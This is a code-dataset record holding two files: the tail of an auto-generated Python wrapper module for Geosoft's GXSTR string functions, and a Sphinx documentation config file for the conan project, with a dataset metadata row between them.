istr.value = gxapi_cy.WrapSTR._replacei_match_string(GXContext._get_tls_geo(), istr.value.encode(), old.encode(), new_str.encode())
@classmethod
def replace_match_string(cls, istr, old, new_str):
"""
Replaces all occurances of match string by replacement string with case sensitive.
:param istr: Destination String
:param old: Match string to replace
:param new_str: Replacement string
:type istr: str_ref
:type old: str
:type new_str: str
.. versionadded:: 7.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the replacement string is "" (NULL character)
then the string to replace is removed from the
input string, and the string is shortened.
"""
istr.value = gxapi_cy.WrapSTR._replace_match_string(GXContext._get_tls_geo(), istr.value.encode(), old.encode(), new_str.encode())
@classmethod
def set_char_n(cls, str_val, c, ascii):
"""
Set the n'th character of a string using an ASCII value
:param str_val: String
:param c: Character to set
:param ascii: ASCII value
:type str_val: str_ref
:type c: int
:type ascii: int
.. versionadded:: 5.1.4
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
str_val.value = gxapi_cy.WrapSTR._set_char_n(GXContext._get_tls_geo(), str_val.value.encode(), c, ascii)
@classmethod
def split_string(cls, origstr, ch, split):
"""
Splits a string in two on a character.
:param origstr: Original string
:param ch: Split character (first character of string)
:param split: Split string past split character.
:type origstr: str_ref
:type ch: str
:type split: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The original string is modified by terminating it
at the character split.
The part of the string past the character split is
copied to the split string.
Split characters in quoted strings are ignored.
This function is mainly intended to separate comments
from control file strings.
"""
origstr.value, split.value = gxapi_cy.WrapSTR._split_string(GXContext._get_tls_geo(), origstr.value.encode(), ch.encode(), split.value.encode())
@classmethod
def strcat(cls, dest, orig):
"""
This method contatinates a string.
:param dest: Destination String
:param orig: String to add
:type dest: str_ref
:type orig: str
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
dest.value = gxapi_cy.WrapSTR._strcat(GXContext._get_tls_geo(), dest.value.encode(), orig.encode())
@classmethod
def strcmp(cls, first, second, case_sensitive):
"""
This method compares two strings and returns these values
:param first: String A
:param second: String B
:param case_sensitive: :ref:`STR_CASE`
:type first: str
:type second: str
:type case_sensitive: int
:returns: A < B -1
A == B 0
A > B 1
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._strcmp(GXContext._get_tls_geo(), first.encode(), second.encode(), case_sensitive)
return ret_val
@classmethod
def strcpy(cls, dest, orig):
"""
This method copies a string into another string.
:param dest: Destination string
:param orig: Origin string
:type dest: str_ref
:type orig: str
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
dest.value = gxapi_cy.WrapSTR._strcpy(GXContext._get_tls_geo(), dest.value.encode(), orig.encode())
@classmethod
def stri_mask(cls, mask, test):
"""
Case insensitive comparison of two strings.
:param mask: Mask
:param test: String to test
:type mask: str
:type test: str
:returns: 0 if string does not match mask.
1 if string matches mask.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Mask characters '*' - matches any one or more up to
next character
'?' - matches one character
Test is case insensitive
"""
ret_val = gxapi_cy.WrapSTR._stri_mask(GXContext._get_tls_geo(), mask.encode(), test.encode())
return ret_val
@classmethod
def strins(cls, dest, ins, orig):
"""
This method inserts a string at a specified position.
:param dest: Destination String
:param ins: Insert Position
:param orig: String to add
:type dest: str_ref
:type ins: int
:type orig: str
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the specified position does not fall within the current string
the source string will simply be Concatenated.
"""
dest.value = gxapi_cy.WrapSTR._strins(GXContext._get_tls_geo(), dest.value.encode(), ins, orig.encode())
@classmethod
def strlen(cls, str_val):
"""
Returns the length of a string.
:param str_val: String to find the length of
:type str_val: str
:returns: String length.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._strlen(GXContext._get_tls_geo(), str_val.encode())
return ret_val
@classmethod
def str_mask(cls, mask, test):
"""
Case sensitive comparison of two strings.
:param mask: Mask
:param test: String to test
:type mask: str
:type test: str
:returns: 0 if string does not match mask.
1 if string matches mask.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Mask characters '*' - matches any one or more up to
next character
'?' - matches one character
Test is case sensitive
"""
ret_val = gxapi_cy.WrapSTR._str_mask(GXContext._get_tls_geo(), mask.encode(), test.encode())
return ret_val
@classmethod
def str_min(cls, str_val):
"""
Remove spaces and tabs and return length
:param str_val: String to find the min length of
:type str_val: str_ref
:returns: String length.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** String may be modified. This function should not be
used to determine if a file name string is defined, because
a valid file name can contain spaces, and once "tested" the
name will be altered. Instead, use `str_min2 <geosoft.gxapi.GXSTR.str_min2>`, or use
`GXSYS.file_exist <geosoft.gxapi.GXSYS.file_exist>` to see if the file actually exists.
"""
ret_val, str_val.value = gxapi_cy.WrapSTR._str_min(GXContext._get_tls_geo(), str_val.value.encode())
return ret_val
@classmethod
def str_min2(cls, str_val):
"""
Length less spaces and tabs, string unchanged.
:param str_val: String to find the min length of
:type str_val: str
:returns: String length.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._str_min2(GXContext._get_tls_geo(), str_val.encode())
return ret_val
@classmethod
def strncmp(cls, first, second, n_char, case_sensitive):
"""
Compares two strings to a given number of characters.
:param first: String A
:param second: String B
:param n_char: Number of characters to compare
:param case_sensitive: :ref:`STR_CASE`
:type first: str
:type second: str
:type n_char: int
:type case_sensitive: int
:returns: A < B -1
A == B 0
A > B 1
:rtype: int
.. versionadded:: 5.0.5
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._strncmp(GXContext._get_tls_geo(), first.encode(), second.encode(), n_char, case_sensitive)
return ret_val
@classmethod
def str_str(cls, str_val, sub, case_sensitive):
"""
Scan a string for the occurrence of a given substring.
:param str_val: String to scan
:param sub: String to look for
:param case_sensitive: :ref:`STR_CASE`
:type str_val: str
:type sub: str
:type case_sensitive: int
:returns: -1 if the substring does not occur in the string
Index of first matching location if found
:rtype: int
.. versionadded:: 5.1.6
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
ret_val = gxapi_cy.WrapSTR._str_str(GXContext._get_tls_geo(), str_val.encode(), sub.encode(), case_sensitive)
return ret_val
@classmethod
def substr(cls, dest, orig, start, length):
"""
Extract part of a string.
:param dest: Destination string
:param orig: Origin string
:param start: Start location
:param length: Number of characters
:type dest: str_ref
:type orig: str
:type start: int
:type length: int
.. versionadded:: 6.2
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The destination string length will be less than the
requested length if the substring is not fully enclosed
in the origin string.
"""
dest.value = gxapi_cy.WrapSTR._substr(GXContext._get_tls_geo(), dest.value.encode(), orig.encode(), start, length)
@classmethod
def to_lower(cls, str_val):
"""
Convert a string to lower case.
:param str_val: String
:type str_val: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
str_val.value = gxapi_cy.WrapSTR._to_lower(GXContext._get_tls_geo(), str_val.value.encode())
@classmethod
def to_upper(cls, str_val):
"""
Convert a string to upper case.
:param str_val: String
:type str_val: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
str_val.value = gxapi_cy.WrapSTR._to_upper(GXContext._get_tls_geo(), str_val.value.encode())
@classmethod
def xyz_line(cls, line, xyz):
"""
Make a valid XYZ line name from a valid `GXDB <geosoft.gxapi.GXDB>` line name.
:param line: Line name to convert
:param xyz: Buffer to hold new line name
:type line: str
:type xyz: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
xyz.value = gxapi_cy.WrapSTR._xyz_line(GXContext._get_tls_geo(), line.encode(), xyz.value.encode())
@classmethod
def make_alpha(cls, str_val):
"""
Turns all non alpha-numeric characters into an _.
:param str_val: String to trim
:type str_val: str_ref
.. versionadded:: 5.1.8
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** THE STRING IS MODIFIED.
"""
str_val.value = gxapi_cy.WrapSTR._make_alpha(GXContext._get_tls_geo(), str_val.value.encode())
@classmethod
def printf(cls, dest, mask):
"""
Variable Argument PrintF function
:param dest: Destination string
:param mask: Pattern string
:type dest: str_ref
:type mask: str
.. versionadded:: 7.3
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
dest.value = gxapi_cy.WrapSTR._printf(GXContext._get_tls_geo(), dest.value.encode(), mask.encode())
@classmethod
def replace_char(cls, istr, old, new_char):
"""
Replaces characters in a string.
:param istr: String to modify
:param old: Character to replace (first character only)
:param new_char: Replacement character (first character only)
:type istr: str_ref
:type old: str
:type new_char: str
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the input replacement character is "", then the
string will be truncated at the first character to replace.
"""
istr.value = gxapi_cy.WrapSTR._replace_char(GXContext._get_tls_geo(), istr.value.encode(), old.encode(), new_char.encode())
@classmethod
def replace_char2(cls, istr, old, new_char):
"""
Replaces characters in a string, supports simple removal.
:param istr: String to modify
:param old: Character to replace (first character only)
:param new_char: Replacement character (first character only)
:type istr: str_ref
:type old: str
:type new_char: str
.. versionadded:: 6.3
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** If the replacement character is "" (NULL character)
then the character to replace is removed from the
input string, and the string is shortened.
"""
istr.value = gxapi_cy.WrapSTR._replace_char2(GXContext._get_tls_geo(), istr.value.encode(), old.encode(), new_char.encode())
@classmethod
def replace_multi_char(cls, istr, old, new_char):
"""
Replaces multiple characters in a string.
:param istr: String to modify
:param old: Characters to replace
:param new_char: Replacement characters
:type istr: str_ref
:type old: str
:type new_char: str
.. versionadded:: 5.1.5
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The number of characters to replace must equal
the number of replacement characters.
"""
istr.value = gxapi_cy.WrapSTR._replace_multi_char(GXContext._get_tls_geo(), istr.value.encode(), old.encode(), new_char.encode())
@classmethod
def replace_non_ascii(cls, str_val, rpl):
"""
Replace non-ASCII characters in a string.
:param str_val: String to modify
:param rpl: Replacement character
:type str_val: str_ref
:type rpl: str
.. versionadded:: 6.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** All characthers > 127 will be replaced by the first character
of the replacement string.
"""
str_val.value = gxapi_cy.WrapSTR._replace_non_ascii(GXContext._get_tls_geo(), str_val.value.encode(), rpl.encode())
@classmethod
def set_char(cls, str_val, ascii):
"""
Set a string's first character using an ASCII value of a character.
:param str_val: String
:param ascii: ASCII value
:type str_val: str_ref
:type ascii: int
.. versionadded:: 5.1.4
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
"""
str_val.value = gxapi_cy.WrapSTR._set_char(GXContext._get_tls_geo(), str_val.value.encode(), ascii)
@classmethod
def trim_quotes(cls, str_val):
"""
Remove double quotes.
:param str_val: String to trim
:type str_val: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** THE STRING IS MODIFIED.
This method goes through the string and removes all spaces in a
string except those enclosed in quotes. It then removes
any quotes. It is usfull for trimming unwanted spaces from
an input string but allows the user to use quotes as well.
If a quote follows a backslash, the quote is retained and
the backslash is deleted. These quotes are NOT treated as
delimiters.
"""
str_val.value = gxapi_cy.WrapSTR._trim_quotes(GXContext._get_tls_geo(), str_val.value.encode())
@classmethod
def trim_space(cls, str_val, trim):
"""
Remove leading and/or trailing whitespace.
:param str_val: String to trim
:param trim: :ref:`STR_TRIM`
:type str_val: str_ref
:type trim: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** THE STRING IS MODIFIED.
Whitespace characters are defined as space, tab, carriage return,
new line, vertical tab or formfeed (0x09 to 0x0D, 0x20)
"""
str_val.value = gxapi_cy.WrapSTR._trim_space(GXContext._get_tls_geo(), str_val.value.encode(), trim)
@classmethod
def un_quote(cls, str_val):
"""
Remove double quotes from string
:param str_val: String to unquote
:type str_val: str_ref
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** THE STRING IS MODIFIED.
The pointers will be advanced past a first character
quote and a last character quote will be set to .\\0'.
Both first and last characters must be quotes for the
triming to take place.
"""
str_val.value = gxapi_cy.WrapSTR._un_quote(GXContext._get_tls_geo(), str_val.value.encode())
# Misc
@classmethod
def gen_group_name(cls, istr1, istr2, istr3, ostr):
"""
Generate a group name string
from type string, database and channel(optional) strings..
:param istr1: Input type string (static part)
:param istr2: Input db string
:param istr3: Input ch string (could be 0 length)
:param ostr: Output group name string
:type istr1: str
:type istr2: str
:type istr3: str
:type ostr: str_ref
.. versionadded:: 5.1.4
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** The output group name string is formed in the way of typestr_dbstr_chstr.
If the database/channel strings is too long to fit the output string
(max total length of 1040, including the NULL ending), then
the typestr will always be kept the full length to be the first part,
while the dbstr and/or chstr will be shortened to be the
second and/or third part of the output string.
.. seealso::
GenNewGroupName_MVIEW
"""
ostr.value = gxapi_cy.WrapSTR._gen_group_name(GXContext._get_tls_geo(), istr1.encode(), istr2.encode(), istr3.encode(), ostr.value.encode())
# Tokenizing
@classmethod
def count_tokens(cls, str_val, delims):
"""
Counts number of tokens.
:param str_val: String to tokenize
:param delims: Delimiter characters
:type str_val: str
:type delims: str
:returns: Number of tokens in the string.
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Delimiters are "soft" in that one or more delimiters
is considered a single delimiter, and preceding and
trailing delimiters are ignored.
DO NOT use this function except in GXC code. The corresponding
`get_token <geosoft.gxapi.GXSTR.get_token>` function will not operate correctly in GX.Net code.
"""
ret_val = gxapi_cy.WrapSTR._count_tokens(GXContext._get_tls_geo(), str_val.encode(), delims.encode())
return ret_val
@classmethod
def get_token(cls, dest, orig, tok):
"""
Get a token from a tokenized string.
:param dest: Destination string
:param orig: Tokenized string
:param tok: Token number wanted (0 is the first!)
:type dest: str_ref
:type orig: str
:type tok: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Call `tokens <geosoft.gxapi.GXSTR.tokens>` to prepare the tokenized
string.
You MUST NOT get tokens beyond number of tokens returned
by `tokens <geosoft.gxapi.GXSTR.tokens>` or `tokens2 <geosoft.gxapi.GXSTR.tokens2>`.
The first token has index 0.
DO NOT use this function except in GXC code.
`get_token <geosoft.gxapi.GXSTR.get_token>` function will not operate correctly in GX.Net code.
.. seealso::
`tokens <geosoft.gxapi.GXSTR.tokens>`, GetToken_STR
"""
dest.value = gxapi_cy.WrapSTR._get_token(GXContext._get_tls_geo(), dest.value.encode(), orig.encode(), tok)
@classmethod
def tokenize(cls, str_val, soft, hard, esc, quote):
"""
Tokenize a string based on any characters.
:param str_val: `GXSTR <geosoft.gxapi.GXSTR>` - String containing token(s)
:param soft: szSoft - Soft delimiters (spaces/tabs)
:param hard: szHard - Hard delimiters (commas)
:param esc: szEsc - Escape delimiters (back-slash)
:param quote: szQuote- Quote delimiters (quote characters)
:type str_val: str_ref
:type soft: str
:type hard: str
:type esc: str
:type quote: str
:returns: Number of tokens
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** This uses a finite state machine to tokenize on these
rules:
1. Any one character following an escape delimiter is
treated as a normal character.
2. Any characters inside a quote string are treated as
normal characters.
3. Any number of Soft delimiters in sequence without a
hard delimiter are treated as one hard delimited.
4. Any number of soft delimiters can preceed or follow
a hard delimiter and are ignored.
EXAMPLE
Soft = [ ] Hard = [,] Escape = [\\] Quote = ["]
[this is a , , the "test," of , \\,\\" my delimite fi,]
Results in:
[this] [is] [a] [] [the] ["test,"] [of] [\\,\\"] [my] [delimite] [fi] []
NOT use this function except in GXC code. The corresponding
etToken_STR function will not operate correctly in GX.Net code.
.. seealso::
GetToken_STR
"""
ret_val, str_val.value = gxapi_cy.WrapSTR._tokenize(GXContext._get_tls_geo(), str_val.value.encode(), soft.encode(), hard.encode(), esc.encode(), quote.encode())
return ret_val
@classmethod
def tokens(cls, str_val, delims):
"""
Tokenize a string
:param str_val: String to tokenize
:param delims: Delimiter characters
:type str_val: str_ref
:type delims: str
:returns: Number of tokens, maximum is 2048
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Delimiters in the string are reduced to a single NULL.
Delimiters withing double quoted strings are ignored.
Use GetToken_STR to extract tokens.
DO NOT use this function except in GXC code. The corresponding
`get_token <geosoft.gxapi.GXSTR.get_token>` function will not operate correctly in GX.Net code.
.. seealso::
`tokens2 <geosoft.gxapi.GXSTR.tokens2>`, GetToken_STR
"""
ret_val, str_val.value = gxapi_cy.WrapSTR._tokens(GXContext._get_tls_geo(), str_val.value.encode(), delims.encode())
return ret_val
@classmethod
def tokens2(cls, str_val, soft, hard, esc, quote):
"""
General tokenize a string
:param str_val: String to tokenize
:param soft: szSoft - Soft delimiters (spaces/tabs)
:param hard: szHard - Hard delimiters (commas)
:param esc: szEsc - Escape delimiters (back-slash)
:param quote: szQuote- Quote delimiters (quote characters)
:type str_val: str_ref
:type soft: str
:type hard: str
:type esc: str
:type quote: str
:returns: Number of Tokens
:rtype: int
.. versionadded:: 5.0
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** This function is for old GX compatibility only.
See `tokenize <geosoft.gxapi.GXSTR.tokenize>`.
DO NOT use this function except in GXC code. The corresponding
`get_token <geosoft.gxapi.GXSTR.get_token>` function will not operate correctly in GX.Net code.
"""
ret_val, str_val.value = gxapi_cy.WrapSTR._tokens2(GXContext._get_tls_geo(), str_val.value.encode(), soft.encode(), hard.encode(), esc.encode(), quote.encode())
return ret_val
@classmethod
def parse_list(cls, str_val, gvv):
"""
Parse a tokenized list to get a selection list.
:param str_val: String to be parsed
:param gvv: Selection Buffer to fill
:type str_val: str
:type gvv: GXVV
.. versionadded:: 5.0.1
**License:** `Geosoft Open License <https://geosoftgxdev.atlassian.net/wiki/spaces/GD/pages/2359406/License#License-open-lic>`_
**Note:** Given a list such as "1,3,4,6-9,12", it fills the
input buffer with 1 if the number is selected,
0 if not. The items are delimited with spaces
or commas, and ranges are acceptable, either using
a "-" or ":", e.g. 3-6 and 3:6 both mean 3,4,5, and 6.
Only values from 0 to one less than the buffer length
are used. Out-of-range values are ignored.
"""
gxapi_cy.WrapSTR._parse_list(GXContext._get_tls_geo(), str_val.encode(), gvv)
### endblock ClassImplementation
### block ClassExtend
# NOTICE: The code generator will not replace the code in this block
### endblock ClassExtend
### block Footer
# NOTICE: The code generator will not replace the code in this block
### endblock Footer | bsd-2-clause | -3,684,899,027,531,421,700 | 31.354388 | 188 | 0.58097 | false |
aptakhin/docs | conf.py | 1 | 11385 | # -*- coding: utf-8 -*-
#
# conan documentation build configuration file, created by
# sphinx-quickstart on Thu May 21 10:27:36 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.todo',
'sphinx.ext.pngmath',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'conan'
copyright = u'2015, conan'
author = u'conan'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.4'
# The full version, including alpha/beta/rc tags.
release = '0.4.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# based on: https://github.com/snide/sphinx_rtd_theme
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = ["_themes"]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = []
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'conandoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'conan.tex', u'conan Documentation',
u'conan', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'conan', u'conan Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'conan', u'conan Documentation',
author, 'conan', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# -- Options for Epub output ----------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
epub_author = author
epub_publisher = author
epub_copyright = copyright
# The basename for the epub file. It defaults to the project name.
#epub_basename = project
# The HTML theme for the epub output. Since the default themes are not optimized
# for small screen space, using the same theme for HTML and epub output is
# usually not wise. This defaults to 'epub', a theme designed to save visual
# space.
#epub_theme = 'epub'
# The language of the text. It defaults to the language option
# or 'en' if the language is not set.
#epub_language = ''
# The scheme of the identifier. Typical schemes are ISBN or URL.
#epub_scheme = ''
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#epub_identifier = ''
# A unique identification for the text.
#epub_uid = ''
# A tuple containing the cover image and cover page html template filenames.
#epub_cover = ()
# A sequence of (type, uri, title) tuples for the guide element of content.opf.
#epub_guide = ()
# HTML files that should be inserted before the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_pre_files = []
# HTML files shat should be inserted after the pages created by sphinx.
# The format is a list of tuples containing the path and title.
#epub_post_files = []
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# The depth of the table of contents in toc.ncx.
#epub_tocdepth = 3
# Allow duplicate toc entries.
#epub_tocdup = True
# Choose between 'default' and 'includehidden'.
#epub_tocscope = 'default'
# Fix unsupported image types using the Pillow.
#epub_fix_images = False
# Scale large images.
#epub_max_image_width = 0
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#epub_show_urls = 'inline'
# If false, no index is generated.
#epub_use_index = True
| mit | -5,884,956,265,093,350,000 | 30.277473 | 80 | 0.706632 | false |
